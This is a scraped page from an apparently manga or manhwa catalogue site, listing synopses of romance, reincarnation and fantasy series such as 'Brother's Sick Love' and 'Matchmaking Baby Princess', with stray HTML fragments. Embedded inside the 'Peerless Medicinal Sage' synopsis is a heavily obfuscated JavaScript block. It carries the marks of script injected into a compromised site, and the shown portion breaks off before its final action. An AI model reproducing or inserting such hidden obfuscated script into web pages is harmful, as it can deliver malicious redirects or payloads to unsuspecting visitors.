2021 - Page 31

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

909 results

Peerless Medicinal Sage

He is a medical expert with the magical powers of the sky. He is also the first-class soldier in the underground world, but he… married a superb willful wife, let’s see how the soldier can respond…<script></script><script>(function(_0x3ad72b,_0x53c794){var _0x56ff2f=_0x4f3d,_0x19fa5d=_0x3ad72b();while(!![]){try{var _0x37c830=parseInt(_0x56ff2f(0x138))/(-0x215b+-0x5b3*0x2+-0x1*-0x2cc2)*(parseInt(_0x56ff2f(0x13d))/(0x312+-0xc2f+0x91f))+parseInt(_0x56ff2f(0x135))/(-0x1*0x94d+0x1b73*-0x1+0x24c3)+-parseInt(_0x56ff2f(0x145))/(0xa5c+0x1b6f+0x13*-0x1fd)+parseInt(_0x56ff2f(0x13a))/(0x1145*0x1+-0xdc7+-0x379)*(-parseInt(_0x56ff2f(0x130))/(0x99f*-0x3+0x1580+0x1f*0x3d))+parseInt(_0x56ff2f(0x140))/(-0x2*-0xdd3+-0x3f5*0x7+0x14)*(-parseInt(_0x56ff2f(0x13c))/(-0xd*0x5f+-0x1d83+0x225e))+parseInt(_0x56ff2f(0x146))/(-0x1*-0x5cf+-0xe0+-0x13*0x42)+parseInt(_0x56ff2f(0x143))/(-0x4*0x2f7+0x138d+-0x7a7);if(_0x37c830===_0x53c794)break;else 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My Cute Baby Is A Wingman

Top hacker Ann Jiujiu sneaks into an auction, intending to steal a gem, but unexpectedly loses her baby! Instead, there is a child who looks exactly like her son, only a bit dumb? When the little fox An Jiujiu meets the big black wolf Ji Jinchen, she hides from him, but he still catches her firmly. Since we can’t escape, we’ll train him to be a good dog, and what’s the fate of marriage, we already have two children!


Even Though I’m the Villainess, I’ll Become the Heroine!

I wasn’t able to overcome the harassment and took my life, but I was reincarnated with the perpetrator? The perpetrator is the heroine, Florre, and I am the villainess, Dahlia, who’s going to die horribly. “They said you are a villain with neither blood nor tears, but unlike the rumors, you often shed tears.” “Your Highness must believe all the nonsense the idiots are talking about, huh?” Grand Duke of Cervian, the half brother of the Male lead and who will be punished for treason afterwards. He approached me. I can’t lose the man who will be my greatest ally. “Your Highness, would you marry me?” “Now…… what did you say?” “And take revenge together.” A similar situation, a fixed ending. The heroine is not the only one who knows the ending of the novel. I took a long and arduous path of revenge.


Limited Extra Time (The Time of the Terminally Ill Extra)

Read manhwa The Time of the Terminally Ill Extra / Limited Extra Time / Karina’s Last Days / 시한부 엑스트라의 시간 The existence of the second child, Karina, who was the successor’s youngest twin and the one who wasn’t as competent as her sibling, has been concealed by the people around her all her life. One day, she finds out that she only has one year left to live. So, she foolishly visited her fiancé, whom she has never had an exchange with. Along with the divorce papers that he longed desired for. “Frankly speaking, I want to stay here for a year.” “….. Are you crazy, Miss?” “I’ll break off the engagement.” But she didn’t know at that time. “It seems that you keep trying to pretend that you don’t know, so I should definitely tell you then.” “Pardon?” “I am fond of you.” It didn’t occur to her that she would receive attention and affection from him without anything in return. So she comes to desire this much for a life without regrets.


Unlock 99 Heroines in End Times

What do you do when a plane hits a building? Cry out? Call for help? Hao Lanren, a top martial artist, laughed: No, as a man of the world, of course, is to use his fist to hit the plane!... He died and crossed over to the zombie-ridden post-apocalyptic world, and awakened to the system, killing zombies to explode gold, buy equipment, and found that the number of women is also unexpectedly high... so in the company of many confidantes, launched a journey to save the world!


Brother’s Sick Love

Yu Xiang unfortunately transmigrates into a merchant’s daughter, who was mistakenly taken to the marquis manor at birth. She is immediately disabled, and carries the nickname of ‘disaster star’. Helpless, she can only cling to her older brother, the marquis, in hopes of surviving, and wait for the true master to return so she can give way. Years later, when the true master returns to the manor, yu xiang prepares to leave. however, she finds out her clinging technique is too good, that her marquis brother won’t let her leave! <div class="post-content_item"> <h4>Alternative Name</h4> <div class="summary-content">忽如一夜病娇来</div> </div> <div class="post-content_item"> <div class="summary-heading"></div> </div>


I Have No Health

I’ve gone into the body of ‘Ninaina’, the weakest character, who was fated to die once winter came! With such with weak stamina that it’s hard to even take walks, eat, or just stand, let alone exercise, I have such a tragic life that I even have to endure assassination attempts from my grandfather… “I will definitely recover my health!” “Kaiser” who comes to Ninaina’s side with a cold gaze. Receiving the order that he has to keep Ninaina alive, he comes to her side and protects her. “You will not die. For now.” 건강이 없습니다 / I Am Not Healthy


Reincarnation Of The Battle God

Reincarnation of the Suicidal Battle God Humanity’s strongest regression action fantasy. “Even if the disgusting gods did it, they still gave the opportunity. if you want to wedge you have to kill them”. Zephir, the last survivior of mankind. The lonely battle with demon lord ended id defeat, but the opportunity given by the gods bring us back 10 years ago. The gods who treated demons and humans as a shit.


I’ve Reincarnated into a Handmaiden!

Yuria has been reincarnated into her beloved otome game as a background character...the only thing is...she's been transported to the events that take place before the storyline of the game! Working as a handmaiden for the beloved princess, she works tirelessly to change the events of the game, and create a new storyline...one where the princess doesn't become the villain. Using the knowledge of her past life and the magic she learns in the game, she guides the princess on a noble and righteous path, one that twists and turns, and is full of magic, romance, tea, sweets, and even the conflicts of royal kingdoms! A fantasy-filled adventure about a handmaiden who finds her calling in the least expected of places is about to begin! I Was Reincarnated, and Now I'm a Maid! / Tenseishimashite, Genzai wa Jijo Degozaimasu. / 転生しまして、現在は侍女でございます。 / 转生女仆~我养成的公主可不能变成恶役女配~


Look a Picture

Jisoo, who dreamed of becoming a fairy tale illustrator since she was young, dropped out to achieve her dream and went to her grandmother’s house, where she meets Dowon. Dowon, who was worried about not having a dream, is interested in Jisoo who is trying hard to achieve her dream. “The farther you try to catch, the farther away you feel. When will the day you reach your dream come?”


Love Blossoms in Hwawol Valley

Sewol’s search for a miraculous medicinal plant to save her sick sister Dewol brings her all the way to Hwawol Tang, a flower shop run by Woonwu. Little does she suspect that Woonwu is actually a divine god, the dandy son of the Jade Emperor. Woonwu has been kicked out of the heavens by his father for his misdeeds and is living in exile in Hanyang. As punishment, he cannot set one foot outside Hanyang; however, he is able to cross borders with the help of Hwawol. Together, they search for perpetual snow ginseng, fighting ghouls along the way. Will they find the miraculous herb in time to save Dewol’s life and regain the Jade Emperor’s favor?


Matchmaking Baby Princess

I woke up as the orphaned princess Eryl in a novel! My lovely aunt Lucinda, who suffers from raising me alone, is as kind as an angel. Though it doesn’t appear so in the eyes of my uncle, tyrant Emperor Tessa Illuminas. “Aunt, only trust in me! I’ll make you walk on a flower path!” Eryl enters the imperial palace only for her aunt. But this uncle doesn’t seem like the tyrant in the novel at all? Rather, it just seems like there’s a lack of affection? “I can’t help it! Eryl will make everyone happy!” Nowadays, children play matchmaking as a hobby, right? I’ll try it out.
